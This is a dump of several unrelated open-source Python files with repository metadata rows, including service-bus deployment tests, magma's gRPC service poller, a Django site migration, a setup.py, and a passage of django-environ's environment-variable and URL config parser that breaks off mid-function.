    await receive_message_and_update_deployment(app)
    operations_repo_mock().update_operation_status.assert_called_once_with(expected_operation.id, expected_operation.status, expected_operation.message)
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_outputs_are_added_to_resource_item(app, sb_client, logging_mock, repo, _):
    """Deployment outputs are merged into the resource's properties.

    Also checks that the JSON-quoted value of "name2" is unquoted.
    """
    # Fix: copy the shared outputs fixture instead of mutating it in place.
    received_message = {**test_sb_message_with_outputs, "status": Status.Deployed}
    service_bus_received_message_mock = ServiceBusReceivedMessageMock(received_message)
    sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
    sb_client().get_queue_receiver().complete_message = AsyncMock()
    resource = create_sample_workspace_object(received_message["id"])
    resource.properties = {"exitingName": "exitingValue"}
    # Snapshot the pre-merge dict NOW: the repo must return the un-merged state.
    repo().get_resource_dict_by_id.return_value = resource.dict()
    new_params = {"name1": "value1", "name2": "value2"}
    expected_resource = resource
    expected_resource.properties = {**resource.properties, **new_params}
    await receive_message_and_update_deployment(app)
    repo().update_item_dict.assert_called_once_with(expected_resource.dict())
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_properties_dont_change_with_no_outputs(app, sb_client, logging_mock, repo, _):
    """Without an "outputs" field the resource properties stay untouched."""
    # Fix: copy the shared fixture instead of mutating it in place.
    received_message = {**test_sb_message, "status": Status.Deployed}
    service_bus_received_message_mock = ServiceBusReceivedMessageMock(received_message)
    sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
    sb_client().get_queue_receiver().complete_message = AsyncMock()
    resource = create_sample_workspace_object(received_message["id"])
    resource.properties = {"exitingName": "exitingValue"}
    repo().get_resource_dict_by_id.return_value = resource.dict()
    expected_resource = resource
    await receive_message_and_update_deployment(app)
    # Saved back unchanged: no outputs were merged in.
    repo().update_item_dict.assert_called_once_with(expected_resource.dict())
| 42.653285 | 152 | 0.802344 |
acdfad464d35f70652d1be3ec5ca3cdb2c01bb76 | 5,446 | py | Python | orc8r/gateway/python/magma/magmad/service_poller.py | remo5000/magma | 1d1dd9a23800a8e07b1ce016776d93e12430ec15 | [
"BSD-3-Clause"
] | 2 | 2020-11-05T18:58:26.000Z | 2021-02-09T06:42:49.000Z | orc8r/gateway/python/magma/magmad/service_poller.py | remo5000/magma | 1d1dd9a23800a8e07b1ce016776d93e12430ec15 | [
"BSD-3-Clause"
] | 14 | 2019-11-15T12:01:18.000Z | 2019-12-12T14:37:42.000Z | orc8r/gateway/python/magma/magmad/service_poller.py | 119Vik/magma-1 | 107a7b374466a837fc0a49b283ba9d6ff1d702e3 | [
"BSD-3-Clause"
] | 3 | 2020-08-20T18:45:34.000Z | 2020-08-20T20:18:42.000Z | """
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
import logging
import time
from typing import List
import grpc
from magma.common.job import Job
from magma.common.rpc_utils import grpc_async_wrapper
from magma.common.service_registry import ServiceRegistry
from magma.magmad.metrics import UNEXPECTED_SERVICE_RESTARTS
from orc8r.protos.common_pb2 import Void
from orc8r.protos.service303_pb2_grpc import Service303Stub
class ServiceInfo(object):
    """Tracks status, expected start time and linked services for one service."""

    # Grace period (seconds) within which a restart is not counted as
    # unexpected.
    SERVICE_RESTART_BUFFER_TIME = 30

    def __init__(self, service_name):
        self._service_name = service_name
        self._expected_start_time = time.time()
        self._status = None
        self._linked_services = []
        # Publish a zero sample so the restart counter exists for every
        # service from the start.
        UNEXPECTED_SERVICE_RESTARTS.labels(
            service_name=self._service_name).inc(0)

    @property
    def status(self):
        """Last status object recorded via update()."""
        return self._status

    @property
    def linked_services(self):
        """Services whose restarts are coupled to this one."""
        return self._linked_services

    def add_linked_services(self, service_list):
        """Record each entry of *service_list* as linked, skipping this
        service itself and duplicates."""
        for candidate in service_list:
            if candidate == self._service_name:
                continue
            if candidate in self._linked_services:
                continue
            self._linked_services.append(candidate)

    def update(self, start_time, status):
        """Store *status*; bump the restart counter if *start_time* shows a
        restart later than the grace period allows."""
        self._status = status
        if start_time <= self._expected_start_time:
            # Probably a race in service starts, or magmad restarted
            return
        elapsed = start_time - self._expected_start_time
        if elapsed > self.SERVICE_RESTART_BUFFER_TIME:
            UNEXPECTED_SERVICE_RESTARTS.labels(
                service_name=self._service_name).inc()
        self._expected_start_time = start_time

    def process_service_restart(self):
        """Reset the expected start time after a deliberate restart."""
        self._expected_start_time = time.time()
class ServicePoller(Job):
    """
    Periodically query the services' Service303 interface
    """
    # Periodicity for getting status from other services, in seconds
    GET_STATUS_INTERVAL = 10
    # Timeout when getting status from other local services, in seconds
    GET_STATUS_TIMEOUT = 8
    def __init__(self, loop, config, dynamic_services: List[str]):
        """Build the poller for all configured + currently-enabled dynamic
        services.

        :param loop: event loop handed to the Job base class.
        :param config: magmad config dict; uses 'magma_services',
            'linked_services' and 'non_service303_services'.
        :param dynamic_services: dynamic services enabled at startup.
        """
        super().__init__(
            interval=self.GET_STATUS_INTERVAL,
            loop=loop
        )
        self._config = config
        # Holds a map of service name -> ServiceInfo
        self._service_info = {}
        for service in config['magma_services']:
            self._service_info[service] = ServiceInfo(service)
        for service in dynamic_services:
            self._service_info[service] = ServiceInfo(service)
        # Each entry of 'linked_services' is a group whose restarts are tied
        # together; register the whole group on every member.
        for service_list in config.get('linked_services', []):
            for service in service_list:
                self._service_info[service].add_linked_services(service_list)
    def update_dynamic_services(self,
                                new_services: List[str],
                                stopped_services: List[str]):
        """
        Update the service poller when dynamic services are enabled or disabled
        Args:
            new_services: New services which were enabled
            stopped_services: Old services which were disabled
        """
        for service in new_services:
            self._service_info[service] = ServiceInfo(service)
        for service in stopped_services:
            self._service_info.pop(service)
    @property
    def service_info(self):
        # Map of service name -> ServiceInfo for all polled services.
        return self._service_info
    def process_service_restart(self, service_name):
        """Reset restart bookkeeping for *service_name* and every service
        linked to it, so the deliberate restart is not counted as unexpected."""
        self._service_info[service_name].process_service_restart()
        for linked_service in self._service_info[service_name].linked_services:
            self._service_info[linked_service].process_service_restart()
    async def _run(self):
        # Job hook: one polling pass per GET_STATUS_INTERVAL.
        await self._get_service_info()
    async def _get_service_info(self):
        """
        Make RPC calls to 'GetServiceInfo' functions of other services, to
        get current status.
        """
        for service in self._service_info:
            # Check whether service provides service303 interface
            if service in self._config['non_service303_services']:
                continue
            try:
                chan = ServiceRegistry.get_rpc_channel(
                    service, ServiceRegistry.LOCAL)
            except ValueError:
                # Service can't be contacted
                logging.error('Cant get RPC channel to %s', service)
                continue
            client = Service303Stub(chan)
            try:
                # Await the gRPC future on this job's loop; failures below
                # are logged but never abort the polling pass.
                future = client.GetServiceInfo.future(
                    Void(),
                    self.GET_STATUS_TIMEOUT,
                )
                info = await grpc_async_wrapper(future, self._loop)
                self._service_info[service].update(info.start_time_secs,
                                                   info.status)
            except grpc.RpcError as err:
                logging.error(
                    "GetServiceInfo Error for %s! [%s] %s",
                    service,
                    err.code(),
                    err.details(),
                )
| 35.594771 | 79 | 0.632942 |
acdfae776d0fa7ec88c9682ef01e8282f214f801 | 61 | py | Python | ds/processing/__init__.py | jordanparker6/datascience-starter | 3eef1640a45d19431e9fb26adf5e089d3708dab1 | [
"MIT"
] | 4 | 2020-10-01T23:20:29.000Z | 2021-06-24T08:34:41.000Z | ds/processing/__init__.py | jordanparker6/datascience-starter | 3eef1640a45d19431e9fb26adf5e089d3708dab1 | [
"MIT"
] | null | null | null | ds/processing/__init__.py | jordanparker6/datascience-starter | 3eef1640a45d19431e9fb26adf5e089d3708dab1 | [
"MIT"
] | null | null | null | from .base import ProcessorPipeline
from .processors import * | 30.5 | 35 | 0.836066 |
acdfaeec627996f58568de31339323b95e718264 | 1,020 | py | Python | product_listing_demo/contrib/sites/migrations/0003_set_site_domain_and_name.py | NyntoFive/product_listing_demo | 7398c526d666090a2309a6df63c8aa613050123f | [
"MIT"
] | null | null | null | product_listing_demo/contrib/sites/migrations/0003_set_site_domain_and_name.py | NyntoFive/product_listing_demo | 7398c526d666090a2309a6df63c8aa613050123f | [
"MIT"
] | null | null | null | product_listing_demo/contrib/sites/migrations/0003_set_site_domain_and_name.py | NyntoFive/product_listing_demo | 7398c526d666090a2309a6df63c8aa613050123f | [
"MIT"
] | null | null | null | """
To understand why this file is here, please read:
http://cookiecutter-django.readthedocs.io/en/latest/faq.html#why-is-there-a-django-contrib-sites-directory-in-cookiecutter-django
"""
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
    """Point the default Site at this project's domain and display name."""
    site_model = apps.get_model("sites", "Site")
    new_values = {
        "domain": "nyntofive.com",
        "name": "Product Listing Demo",
    }
    site_model.objects.update_or_create(id=settings.SITE_ID, defaults=new_values)
def update_site_backward(apps, schema_editor):
    """Restore the default Site to Django's stock example.com values."""
    site_model = apps.get_model("sites", "Site")
    defaults = {"domain": "example.com", "name": "example.com"}
    site_model.objects.update_or_create(id=settings.SITE_ID, defaults=defaults)
class Migration(migrations.Migration):
    # Must run after django.contrib.sites' unique-domain migration so the
    # update_or_create above operates on the final schema.
    dependencies = [("sites", "0002_alter_domain_unique")]
    operations = [migrations.RunPython(update_site_forward, update_site_backward)]
| 29.142857 | 129 | 0.688235 |
acdfaf6fb3ff53fafa7a9701c521c8b074c22d56 | 509 | py | Python | setup.py | Ottomossei/mikit | 3f76eb9b726eb2f98e1188a1e863c965854c1aab | [
"MIT"
] | 2 | 2021-01-09T09:04:01.000Z | 2021-01-09T09:04:26.000Z | setup.py | Ottomossei/mikit | 3f76eb9b726eb2f98e1188a1e863c965854c1aab | [
"MIT"
] | null | null | null | setup.py | Ottomossei/mikit | 3f76eb9b726eb2f98e1188a1e863c965854c1aab | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
# Read runtime dependencies from requirements.txt, dropping blank lines so
# setuptools never receives an empty requirement specifier.
with open('requirements.txt', encoding='utf-8') as requirements_file:
    install_requirements = [
        line for line in requirements_file.read().splitlines() if line.strip()
    ]
setup(
    name="mikit",
    version="1.0.0",
    description="Chemical formula-based materials informatics kit",
    author="Ottomossei",
    author_email="seki.jobhunting@gmail.com",
    install_requires=install_requirements,
    url='https://github.com/Ottomossei/mikit/',
    # BUG FIX: `license=license` previously passed the `license` *builtin*
    # (site's interactive help object), not a license string. The project
    # is MIT-licensed.
    license="MIT",
    packages=find_packages(exclude=['example'])
)
acdfb153060eea2b99661361608f30036f0288ac | 32,336 | py | Python | environ/environ.py | KyleKaniecki/django-environ | 44ac6649ad6135ff4246371880298bf732cd1c52 | [
"MIT"
] | 2,518 | 2015-01-09T03:30:05.000Z | 2022-03-30T12:52:05.000Z | environ/environ.py | KyleKaniecki/django-environ | 44ac6649ad6135ff4246371880298bf732cd1c52 | [
"MIT"
] | 334 | 2015-01-02T13:03:41.000Z | 2022-03-16T09:13:40.000Z | environ/environ.py | KyleKaniecki/django-environ | 44ac6649ad6135ff4246371880298bf732cd1c52 | [
"MIT"
] | 327 | 2015-01-02T12:59:05.000Z | 2022-03-31T15:39:27.000Z | # This file is part of the django-environ.
#
# Copyright (c) 2021, Serghei Iakovlev <egrep@protonmail.ch>
# Copyright (c) 2013-2021, Daniele Faraglia <daniele.faraglia@gmail.com>
#
# For the full copyright and license information, please view
# the LICENSE.txt file that was distributed with this source code.
"""
Django-environ allows you to utilize 12factor inspired environment
variables to configure your Django application.
"""
import ast
import logging
import os
import re
import sys
import urllib.parse as urlparselib
import warnings
from urllib.parse import (
parse_qs,
ParseResult,
unquote_plus,
urlparse,
urlunparse,
)
from .compat import (
DJANGO_POSTGRES,
ImproperlyConfigured,
json,
PYMEMCACHE_DRIVER,
REDIS_DRIVER,
)
from .fileaware_mapping import FileAwareMapping
try:
from os import PathLike
except ImportError: # Python 3.5 support
from pathlib import PurePath as PathLike
Openable = (str, PathLike)
logger = logging.getLogger(__name__)
def _cast(value):
# Safely evaluate an expression node or a string containing a Python
# literal or container display.
# https://docs.python.org/3/library/ast.html#ast.literal_eval
try:
return ast.literal_eval(value)
except (ValueError, SyntaxError):
return value
def _cast_int(v):
"""Return int if possible."""
return int(v) if hasattr(v, 'isdigit') and v.isdigit() else v
def _cast_urlstr(v):
return unquote_plus(v) if isinstance(v, str) else v
class NoValue:
    """Sentinel type distinguishing "no default supplied" from ``None``."""

    def __repr__(self):
        # Renders as "<NoValue>" (subclass-aware via the dynamic class name).
        return '<{}>'.format(type(self).__name__)
class Env:
"""Provide scheme-based lookups of environment variables so that each
caller doesn't have to pass in `cast` and `default` parameters.
Usage:::
env = Env(MAIL_ENABLED=bool, SMTP_LOGIN=(str, 'DEFAULT'))
if env('MAIL_ENABLED'):
...
"""
ENVIRON = os.environ
NOTSET = NoValue()
BOOLEAN_TRUE_STRINGS = ('true', 'on', 'ok', 'y', 'yes', '1')
URL_CLASS = ParseResult
POSTGRES_FAMILY = ['postgres', 'postgresql', 'psql', 'pgsql', 'postgis']
ELASTICSEARCH_FAMILY = ['elasticsearch' + x for x in ['', '2', '5', '7']]
DEFAULT_DATABASE_ENV = 'DATABASE_URL'
DB_SCHEMES = {
'postgres': DJANGO_POSTGRES,
'postgresql': DJANGO_POSTGRES,
'psql': DJANGO_POSTGRES,
'pgsql': DJANGO_POSTGRES,
'postgis': 'django.contrib.gis.db.backends.postgis',
'mysql': 'django.db.backends.mysql',
'mysql2': 'django.db.backends.mysql',
'mysql-connector': 'mysql.connector.django',
'mysqlgis': 'django.contrib.gis.db.backends.mysql',
'mssql': 'sql_server.pyodbc',
'oracle': 'django.db.backends.oracle',
'pyodbc': 'sql_server.pyodbc',
'redshift': 'django_redshift_backend',
'spatialite': 'django.contrib.gis.db.backends.spatialite',
'sqlite': 'django.db.backends.sqlite3',
'ldap': 'ldapdb.backends.ldap',
}
_DB_BASE_OPTIONS = [
'CONN_MAX_AGE',
'ATOMIC_REQUESTS',
'AUTOCOMMIT',
'DISABLE_SERVER_SIDE_CURSORS',
]
DEFAULT_CACHE_ENV = 'CACHE_URL'
CACHE_SCHEMES = {
'dbcache': 'django.core.cache.backends.db.DatabaseCache',
'dummycache': 'django.core.cache.backends.dummy.DummyCache',
'filecache': 'django.core.cache.backends.filebased.FileBasedCache',
'locmemcache': 'django.core.cache.backends.locmem.LocMemCache',
'memcache': 'django.core.cache.backends.memcached.MemcachedCache',
'pymemcache': PYMEMCACHE_DRIVER,
'pylibmc': 'django.core.cache.backends.memcached.PyLibMCCache',
'rediscache': REDIS_DRIVER,
'redis': REDIS_DRIVER,
'rediss': REDIS_DRIVER,
}
_CACHE_BASE_OPTIONS = [
'TIMEOUT',
'KEY_PREFIX',
'VERSION',
'KEY_FUNCTION',
'BINARY',
]
DEFAULT_EMAIL_ENV = 'EMAIL_URL'
EMAIL_SCHEMES = {
'smtp': 'django.core.mail.backends.smtp.EmailBackend',
'smtps': 'django.core.mail.backends.smtp.EmailBackend',
'smtp+tls': 'django.core.mail.backends.smtp.EmailBackend',
'smtp+ssl': 'django.core.mail.backends.smtp.EmailBackend',
'consolemail': 'django.core.mail.backends.console.EmailBackend',
'filemail': 'django.core.mail.backends.filebased.EmailBackend',
'memorymail': 'django.core.mail.backends.locmem.EmailBackend',
'dummymail': 'django.core.mail.backends.dummy.EmailBackend'
}
_EMAIL_BASE_OPTIONS = ['EMAIL_USE_TLS', 'EMAIL_USE_SSL']
DEFAULT_SEARCH_ENV = 'SEARCH_URL'
SEARCH_SCHEMES = {
"elasticsearch": "haystack.backends.elasticsearch_backend."
"ElasticsearchSearchEngine",
"elasticsearch2": "haystack.backends.elasticsearch2_backend."
"Elasticsearch2SearchEngine",
"elasticsearch5": "haystack.backends.elasticsearch5_backend."
"Elasticsearch5SearchEngine",
"elasticsearch7": "haystack.backends.elasticsearch7_backend."
"Elasticsearch7SearchEngine",
"solr": "haystack.backends.solr_backend.SolrEngine",
"whoosh": "haystack.backends.whoosh_backend.WhooshEngine",
"xapian": "haystack.backends.xapian_backend.XapianEngine",
"simple": "haystack.backends.simple_backend.SimpleEngine",
}
CLOUDSQL = 'cloudsql'
    def __init__(self, **scheme):
        # ``scheme`` maps variable names to a cast, or a (cast, default)
        # tuple, e.g. ``Env(DEBUG=(bool, False))``.
        # When True, infer the cast from the type of a non-None default.
        self.smart_cast = True
        # When True, un-escape literal "\$" back to "$" after proxy lookup.
        self.escape_proxy = False
        self.scheme = scheme
def __call__(self, var, cast=None, default=NOTSET, parse_default=False):
return self.get_value(
var,
cast=cast,
default=default,
parse_default=parse_default
)
    def __contains__(self, var):
        # Supports ``"NAME" in env`` checks against the live environment.
        return var in self.ENVIRON
# Shortcuts
    def str(self, var, default=NOTSET, multiline=False):
        """Read *var* as ``str``.
        :param multiline: when True, expand literal ``\\n`` (optionally
            ``\\r\\n``) escape sequences in the value into real newlines.
        :rtype: str
        """
        value = self.get_value(var, cast=str, default=default)
        if multiline:
            return re.sub(r'(\\r)?\\n', r'\n', value)
        return value
    def unicode(self, var, default=NOTSET):
        """Helper for python2; identical to :meth:`str` on python3.
        :rtype: unicode
        """
        return self.get_value(var, cast=str, default=default)
    def bytes(self, var, default=NOTSET, encoding='utf8'):
        """Read *var* and encode it to ``bytes`` using *encoding*.
        Values without an ``encode`` method (e.g. an already-bytes default)
        are returned as-is.
        :rtype: bytes
        """
        value = self.get_value(var, cast=str, default=default)
        if hasattr(value, 'encode'):
            return value.encode(encoding)
        return value
    def bool(self, var, default=NOTSET):
        """Read *var* as ``bool`` (see BOOLEAN_TRUE_STRINGS for truthy values).
        :rtype: bool
        """
        return self.get_value(var, cast=bool, default=default)
    def int(self, var, default=NOTSET):
        """Read *var* as ``int``.
        :rtype: int
        """
        return self.get_value(var, cast=int, default=default)
    def float(self, var, default=NOTSET):
        """Read *var* as ``float`` (locale-tolerant, see parse_value).
        :rtype: float
        """
        return self.get_value(var, cast=float, default=default)
    def json(self, var, default=NOTSET):
        """Read *var* and parse it as JSON.
        :returns: Json parsed
        """
        return self.get_value(var, cast=json.loads, default=default)
    def list(self, var, cast=None, default=NOTSET):
        """Read *var* as a comma-separated list; *cast* applies to each item.
        :rtype: list
        """
        return self.get_value(
            var,
            cast=list if not cast else [cast],
            default=default
        )
    def tuple(self, var, cast=None, default=NOTSET):
        """Read *var* as a "(a,b,c)"-style tuple; *cast* applies per item.
        :rtype: tuple
        """
        return self.get_value(
            var,
            cast=tuple if not cast else (cast,),
            default=default
        )
    def dict(self, var, cast=dict, default=NOTSET):
        """Read *var* as "key=value,..." pairs (or a custom cast spec dict).
        :rtype: dict
        """
        return self.get_value(var, cast=cast, default=default)
    def url(self, var, default=NOTSET):
        """Read *var* and parse it with ``urllib.parse.urlparse``.
        The default is parsed too (parse_default=True) so callers always
        receive a ParseResult.
        :rtype: urlparse.ParseResult
        """
        return self.get_value(
            var,
            cast=urlparse,
            default=default,
            parse_default=True
        )
    def db_url(self, var=DEFAULT_DATABASE_ENV, default=NOTSET, engine=None):
        """Returns a Django DATABASES config dict, defaulting to DATABASE_URL.
        Passes the raw string (not a ParseResult) so db_url_config can handle
        the special 'sqlite://:memory:' form before urlparse sees it.
        The db method is an alias for db_url.
        :rtype: dict
        """
        return self.db_url_config(
            self.get_value(var, default=default),
            engine=engine
        )
    db = db_url
    def cache_url(self, var=DEFAULT_CACHE_ENV, default=NOTSET, backend=None):
        """Returns a Django CACHES config dict, defaulting to CACHE_URL.
        The cache method is an alias for cache_url.
        :rtype: dict
        """
        return self.cache_url_config(
            self.url(var, default=default),
            backend=backend
        )
    cache = cache_url
    def email_url(self, var=DEFAULT_EMAIL_ENV, default=NOTSET, backend=None):
        """Returns an email settings dict, defaulting to EMAIL_URL.
        The email method is an alias for email_url.
        :rtype: dict
        """
        return self.email_url_config(
            self.url(var, default=default),
            backend=backend
        )
    email = email_url
    def search_url(self, var=DEFAULT_SEARCH_ENV, default=NOTSET, engine=None):
        """Returns a haystack connection config dict, defaulting to SEARCH_URL.
        :rtype: dict
        """
        return self.search_url_config(
            self.url(var, default=default),
            engine=engine
        )
    def path(self, var, default=NOTSET, **kwargs):
        """Read *var* and wrap it in environ's Path helper.
        :rtype: Path
        """
        return Path(self.get_value(var, default=default), **kwargs)
    def get_value(self, var, cast=None, default=NOTSET, parse_default=False):
        """Return value for given environment variable.
        :param var: Name of variable.
        :param cast: Type to cast return value as.
        :param default: If var not present in environ, return this instead.
        :param parse_default: if True, run the cast over the default value
            as well (used by e.g. :meth:`url`).
        :returns: Value from environment or default (if set)
        :raises ImproperlyConfigured: if *var* is unset and no default exists.
        """
        logger.debug("get '{}' casted as '{}' with default '{}'".format(
            var, cast, default
        ))
        # Scheme declarations (from __init__) supply cast/default when the
        # caller did not pass them explicitly.
        if var in self.scheme:
            var_info = self.scheme[var]
            try:
                has_default = len(var_info) == 2
            except TypeError:
                has_default = False
            if has_default:
                if not cast:
                    cast = var_info[0]
                if default is self.NOTSET:
                    try:
                        default = var_info[1]
                    except IndexError:
                        pass
            else:
                if not cast:
                    cast = var_info
        try:
            value = self.ENVIRON[var]
        except KeyError:
            if default is self.NOTSET:
                error_msg = "Set the {} environment variable".format(var)
                raise ImproperlyConfigured(error_msg)
            value = default
        # Resolve any proxied values: "$OTHER" means "look up OTHER instead";
        # a leading "\$" escapes the proxy when escape_proxy is enabled.
        prefix = b'$' if isinstance(value, bytes) else '$'
        escape = rb'\$' if isinstance(value, bytes) else r'\$'
        if hasattr(value, 'startswith') and value.startswith(prefix):
            value = value.lstrip(prefix)
            value = self.get_value(value, cast=cast, default=default)
            if self.escape_proxy and hasattr(value, 'replace'):
                value = value.replace(escape, prefix)
        # Smart casting
        if self.smart_cast:
            if cast is None and default is not None and \
                    not isinstance(default, NoValue):
                cast = type(default)
        # An empty string with a None default is treated as unset.
        value = None if default is None and value == '' else value
        # Defaults are returned uncast unless parse_default forces parsing.
        if value != default or (parse_default and value):
            value = self.parse_value(value, cast)
        return value
# Class and static methods
    @classmethod
    def parse_value(cls, value, cast):
        """Parse and cast a raw (usually string) environment value.
        The cast may be a type (bool/dict/list/tuple/float/...), a one-element
        list/tuple whose element casts each item, or a dict spec with
        'key'/'value'/'cast' entries. Branch order matters: instance checks
        (a *list containing* a cast) must run before the bare ``cast is list``
        style identity checks.
        :param value: Stringed value.
        :param cast: Type to cast return value as.
        :returns: Casted value
        """
        if cast is None:
            return value
        elif cast is bool:
            try:
                # Numeric strings: anything non-zero is True.
                value = int(value) != 0
            except ValueError:
                value = value.lower() in cls.BOOLEAN_TRUE_STRINGS
        elif isinstance(cast, list):
            # e.g. cast=[int]: comma-separated items, each cast by cast[0].
            value = list(map(cast[0], [x for x in value.split(',') if x]))
        elif isinstance(cast, tuple):
            val = value.strip('(').strip(')').split(',')
            value = tuple(map(cast[0], [x for x in val if x]))
        elif isinstance(cast, dict):
            # Spec dict: 'key' casts keys, 'value' casts values, 'cast' maps
            # specific keys to their own cast. Entries are ";"-separated.
            key_cast = cast.get('key', str)
            value_cast = cast.get('value', str)
            value_cast_by_key = cast.get('cast', dict())
            value = dict(map(
                lambda kv: (
                    key_cast(kv[0]),
                    cls.parse_value(
                        kv[1],
                        value_cast_by_key.get(kv[0], value_cast)
                    )
                ),
                [val.split('=') for val in value.split(';') if val]
            ))
        elif cast is dict:
            value = dict([val.split('=') for val in value.split(',') if val])
        elif cast is list:
            value = [x for x in value.split(',') if x]
        elif cast is tuple:
            val = value.strip('(').strip(')').split(',')
            value = tuple([x for x in val if x])
        elif cast is float:
            # clean string
            float_str = re.sub(r'[^\d,.-]', '', value)
            # split for avoid thousand separator and different
            # locale comma/dot symbol
            parts = re.split(r'[,.]', float_str)
            if len(parts) == 1:
                float_str = parts[0]
            else:
                float_str = "{}.{}".format(''.join(parts[0:-1]), parts[-1])
            value = float(float_str)
        else:
            value = cast(value)
        return value
    @classmethod
    def db_url_config(cls, url, engine=None):
        """Pulled from DJ-Database-URL, parse an arbitrary Database URL.
        Support currently exists for PostgreSQL, PostGIS, MySQL, Oracle and
        SQLite.
        SQLite connects to file based databases. The same URL format is used,
        omitting the hostname, and using the "file" portion as the filename of
        the database. This has the effect of four slashes being present for an
        absolute file path.
        :param url: raw URL string or an already-parsed ParseResult.
        :param engine: optional ENGINE dotted path overriding the scheme map.
        :returns: a Django DATABASES entry dict ({} if the engine is unknown).
        """
        if not isinstance(url, cls.URL_CLASS):
            if url == 'sqlite://:memory:':
                # this is a special case, because if we pass this URL into
                # urlparse, urlparse will choke trying to interpret "memory"
                # as a port number
                return {
                    'ENGINE': cls.DB_SCHEMES['sqlite'],
                    'NAME': ':memory:'
                }
            # note: no other settings are required for sqlite
            url = urlparse(url)
        config = {}
        # Remove query strings.
        path = url.path[1:]
        path = unquote_plus(path.split('?', 2)[0])
        if url.scheme == 'sqlite':
            if path == '':
                # if we are using sqlite and we have no path, then assume we
                # want an in-memory database (this is the behaviour of
                # sqlalchemy)
                path = ':memory:'
            if url.netloc:
                warnings.warn('SQLite URL contains host component %r, '
                              'it will be ignored' % url.netloc, stacklevel=3)
        if url.scheme == 'ldap':
            # ldapdb expects the full "ldap://host[:port]" string as NAME.
            path = '{scheme}://{hostname}'.format(
                scheme=url.scheme,
                hostname=url.hostname,
            )
            if url.port:
                path += ':{port}'.format(port=url.port)
        # Update with environment configuration.
        config.update({
            'NAME': path or '',
            'USER': _cast_urlstr(url.username) or '',
            'PASSWORD': _cast_urlstr(url.password) or '',
            'HOST': url.hostname or '',
            'PORT': _cast_int(url.port) or '',
        })
        # Postgres-family / Cloud SQL socket paths: the path embeds the socket
        # directory as HOST and the final segment as the database NAME.
        if (
            url.scheme in cls.POSTGRES_FAMILY and path.startswith('/')
            or cls.CLOUDSQL in path and path.startswith('/')
        ):
            config['HOST'], config['NAME'] = path.rsplit('/', 1)
        if url.scheme == 'oracle' and path == '':
            config['NAME'] = config['HOST']
            config['HOST'] = ''
        if url.scheme == 'oracle':
            # Django oracle/base.py strips port and fails on non-string value
            if not config['PORT']:
                del (config['PORT'])
            else:
                config['PORT'] = str(config['PORT'])
        if url.query:
            # Recognized keys become top-level settings; the rest go into
            # the backend-specific OPTIONS dict.
            config_options = {}
            for k, v in parse_qs(url.query).items():
                if k.upper() in cls._DB_BASE_OPTIONS:
                    config.update({k.upper(): _cast(v[0])})
                else:
                    config_options.update({k: _cast_int(v[0])})
            config['OPTIONS'] = config_options
        if engine:
            config['ENGINE'] = engine
        else:
            config['ENGINE'] = url.scheme
        if config['ENGINE'] in Env.DB_SCHEMES:
            config['ENGINE'] = Env.DB_SCHEMES[config['ENGINE']]
        if not config.get('ENGINE', False):
            warnings.warn("Engine not recognized from url: {}".format(config))
            return {}
        return config
@classmethod
def cache_url_config(cls, url, backend=None):
    """Pulled from DJ-Cache-URL, parse an arbitrary Cache URL.

    :param url: Cache URL (string) or an already-parsed URL result.
    :param backend: Optional dotted path that overrides the backend
        derived from the URL scheme.
    :return: dict suitable for Django's ``CACHES`` setting entry;
        ``{}`` when ``url`` is empty/falsy.
    :raises ImproperlyConfigured: for an unknown cache scheme.
    """
    if not isinstance(url, cls.URL_CLASS):
        if not url:
            # Empty value: no cache configured.
            return {}
        else:
            url = urlparse(url)

    if url.scheme not in cls.CACHE_SCHEMES:
        raise ImproperlyConfigured(
            'Invalid cache schema {}'.format(url.scheme)
        )

    # netloc may hold a comma-separated list of nodes (cluster setups);
    # collapse to a plain string when there is only one.
    location = url.netloc.split(',')
    if len(location) == 1:
        location = location[0]

    config = {
        'BACKEND': cls.CACHE_SCHEMES[url.scheme],
        'LOCATION': location,
    }

    # Add the drive to LOCATION
    if url.scheme == 'filecache':
        config.update({
            'LOCATION': url.netloc + url.path,
        })

    # urlparse('pymemcache://127.0.0.1:11211')
    # => netloc='127.0.0.1:11211', path=''
    #
    # urlparse('pymemcache://memcached:11211/?key_prefix=ci')
    # => netloc='memcached:11211', path='/'
    #
    # urlparse('memcache:///tmp/memcached.sock')
    # => netloc='', path='/tmp/memcached.sock'
    if not url.netloc and url.scheme in ['memcache', 'pymemcache']:
        # No host part means a unix-socket address lives in the path.
        config.update({
            'LOCATION': 'unix:' + url.path,
        })
    elif url.scheme.startswith('redis'):
        if url.hostname:
            # 'rediscache' -> 'redis', 'redis' stays 'redis'.
            scheme = url.scheme.replace('cache', '')
        else:
            scheme = 'unix'
        locations = [scheme + '://' + loc + url.path
                     for loc in url.netloc.split(',')]
        if len(locations) == 1:
            config['LOCATION'] = locations[0]
        else:
            config['LOCATION'] = locations

    if url.query:
        config_options = {}
        for k, v in parse_qs(url.query).items():
            opt = {k.upper(): _cast(v[0])}
            if k.upper() in cls._CACHE_BASE_OPTIONS:
                # Recognised top-level keys go straight into the config...
                config.update(opt)
            else:
                # ...everything else is passed through as OPTIONS.
                config_options.update(opt)
        config['OPTIONS'] = config_options

    if backend:
        config['BACKEND'] = backend

    return config
@classmethod
def email_url_config(cls, url, backend=None):
    """Parse an email URL into a dict of Django ``EMAIL_*`` settings.

    :param url: Email URL (string) or an already-parsed URL result.
    :param backend: Optional backend dotted path; when given it takes
        precedence and the URL scheme is not validated (preserves the
        historical behaviour).
    :return: dict with EMAIL_HOST, EMAIL_PORT, EMAIL_BACKEND, etc.
    :raises ImproperlyConfigured: if no ``backend`` is given and the
        scheme is not a known email scheme.
    """
    config = {}

    url = urlparse(url) if not isinstance(url, cls.URL_CLASS) else url

    # Remove query strings
    path = url.path[1:]
